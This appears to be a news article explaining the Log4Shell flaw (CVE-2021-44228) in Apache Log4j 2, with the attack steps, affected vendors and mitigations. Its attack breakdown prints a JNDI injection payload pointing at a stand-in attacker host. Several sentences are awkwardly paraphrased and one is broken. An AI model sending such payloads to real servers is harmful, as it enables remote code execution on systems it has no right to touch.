The vulnerability enables execution of the remote code on servers including those which are operated by Apple, Cloudfare, Twitter, Valve, Tencent, and other major service providers.
About the Vulnerability
A serious vulnerability has been found in Apache Log4j 2, an open-source package of Java used to operate logging in many programs and it can be utilized to access the execution of remote code on many servers.
The Apache Software Foundation (ASF) has found the vulnerability as CVE-2021-44228; LunaSec has named it as Log4Shell. ASF claims Log4Shell has the most severity rating, 10, on the Common Vulnerability Scoring System (CVSS) scale.
How to use Log4Shell on vulnerable servers
LunaSec shows a step-by-step breakdown of how Log4Shell can be utilized on servers that are vulnerable:
- From the user, data is sent to the server(by any protocol).
- The server records the data in the request, including the malicious information: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker-controlled server).
- The Log4j Vulnerability is activated by this information and the server makes a request to attacker.com by “Java Naming and Directory Interface” (JNDI).
- The response includes a way to a remote Java class file which is injected into the server process.
- This injected information further activates a second stage and allows an attacker to execute random code.
Evidence is already found by the researchers that Log4Shell can be utilized in servers controlled by Apple, Cloudfare, Twitter, Valve, Tencent, and other big companies. The vulnerability is known to be simple to utilize in servers of Minecraft too, with some proof of theory attacks using nothing else other than the in-game chat.
The 2.15.0 edition of Log4j is released to address this problem but The Record describes that its fix only alters a setting from “false” to “true” by default. The users who change the setting back to “false” are vulnerable to attack. Fortunately, this implies that servers having older versions of Log4j can alleviate the attack by making changes in the setting.
Opinion of ASF and other bodies
ASF says that “this behavior can be mitigated by setting system property ‘log4j2.formatMsgNoLookups’ to ‘true’ or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class)” in the older versions of Log4j if the users cannot update to 2.15.0 version.
The Computer Emergency Response Team (CERT) for New Zealand, Deutsche Telekom’s CERT, the Greynoise security firm, and others have all informed that attackers are deliberately looking for severs which are vulnerable to Log4Shell attacks. These attempts will continue and grow, therefore vulnerability sooner is important.